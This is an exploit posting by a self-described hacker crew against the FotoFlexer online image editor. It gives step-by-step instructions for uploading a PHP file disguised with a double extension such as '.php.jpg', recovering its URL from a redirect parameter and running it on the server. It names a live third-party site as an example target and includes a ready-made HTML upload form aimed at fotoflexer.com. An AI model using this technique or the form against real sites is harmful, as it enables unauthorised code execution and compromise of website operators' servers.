[*]##############################################  
[+] |____ViRuS_HiMa@YouR SyS__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]======================================================================||
[*] Title       : FotoFlexer Remote File Upload Vulnerability            ||
[!] site script : http://www.fotoflexer.com                              ||
[!] Author      : ViRuS_HiMa                                             ||
[!] My Site     : wWw.HeLL-z0ne.org                                      ||                                             
[!] E-Mail      : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM                    ||
[!] Location    : Cairo-007                                              ||
[!]======================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] - [  ViRuS_HiMa ~ MecTruy  ~  RedStorM ]  ||
[!]======================================================================||
[!]  Exploitation :
[!]
[!]  Fotoflexer is A online images editor script . .
[!]
[!]  it's allow you to upload 2 types of images : png & jpg
[!]    
[!]  So you can upload your file as hima.php.jpg 'or' hima.php.png  
[!]
[!]  but how to get your file link after uploading ??  
[!]
[!]  here we got alive e.g on : http://tahyeess.com/fotoflexer/default.aspx
[!]
[!]  after uploading your file you will redirect to this link :
[!]
[!]  http://tahyeess.com/fotoflexer/API_Loader.aspx?ff_image_url=
[!]  http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg
[!]  &ff_callback_url=http://www.tahyeess.com/fotoflexer/callbackTest.aspx
[!]  &ff_logo_url=http://www.tahyeess.com/fotoflexer/images/logo.png
[!]
[!]  yea its too long url but you can find your file link in it ! take look over here :
[!]
[!]  "ff_image_url=http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg"
[!]   
[!]  Thats all we need :)    
[!]
[!]  now you should browse it from  InternetExplorer :)
[!]
[!]===============================================================||
[!] do you want to try it on http://www.fotoflexer.com :)         ||
[!] just use this html code to upload your file                   ||
[!] and you will find your link by the same method on tahyeess.com||
[!] but your file link will be some thing like this :             ||
[!] ff_image_url=http://fotos.fotoflexer.com/2009/07/13/adf487e0  ||                          
[!]===============================================================||

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>FotoFlexer - exploitation testing :)</title>

    <script type="text/javascript">
    /********************************
    Thankx fotoflexer for helping 
        Me to exploit yours :p
    *********************************/

    var ff_image_url;
    var ff_callback_url;
    var ff_cancel_url;
    var ff_lang;
    
    function ff_setup(img_src){       
        ff_image_url = img_src;
        ff_callback_url = "http://fotoflexer.com/API/callbackTest.php";
        ff_cancel_url = "http://fotoflexer.com";
        ff_lang = "en-US";
        ff_activate();
    }
    </script>    
    
    <script type="text/javascript"
        src="http://fotoflexer.com/API/ff_api_v1_01.js">
    </script>
</head>

<body style="text-align: center;">
    <div style="width: 650px; margin: 0 auto;">
    <p style="text-align: left;"><a href="/api.php">Back to FotoFlexer API</a></p>
        <h2>FotoFlexer - Exploitation Testing :)</h2>
        <p style="text-align: left;">this code was already writen by fotoflexer team and edited by ViRuS_HiMa to be decent .</p>
        <p style="text-align: left;">[H]eL[L] [Z]on[E] [C]re[W] - [  ViRuS_HiMa ~ MecTruy  ~  RedStorM ]</p>
        
        <hr />
        
        <h4>Click An Image To Edit:</h4>
        
        <div>
            <img style="cursor:pointer;width:60px;height:60px;padding:10px;" 
            src="http://fotoflexer.com/images/moon_sample.jpg" 
            id="http://fotoflexer.com/samples/moon.jpg" 
            onclick="ff_setup(this.id)" />
            
            <img style="cursor:pointer;width:60px;height:60px;padding:10px;" 
            src="http://fotoflexer.com/images/sunflower_sample.jpg" 
            id="http://fotoflexer.com/samples/sunflower.jpg" 
            onclick="ff_setup(this.id)" />
            
            <img style="cursor:pointer;width:60px;height:60px;padding:10px;" 
            src="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif" 
            id="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif" 
            onclick="ff_setup(this.id)" />
        </div>    
        
        <hr />
        
        <h4>Or, Upload An Image To Edit:</h4>

        <!--Pass the Callback URL as "CB" and the logo URL as "Logo"-->
        <form enctype="multipart/form-data"
        action="http://fotoflexer.com/API/API_Upload.php" method="post">
            
            <p><input name="userfile" type="file" /><br />
            <input type="hidden" name="Logo" value="http://www.fotoflexer.com/images/header.gif" />
            <input type="hidden" name="CB" value="http://www.fotoflexer.com/API/callbackTest.php" /> 
            <input type="submit" value="Upload" /></p>

        </form>

    </div>
</body>
</html>

[*]===================================================================||
[!] Greetz 2 Allah - Muslim Hackers - Str0ke - And oTherz .           ||
[*]===================================================================||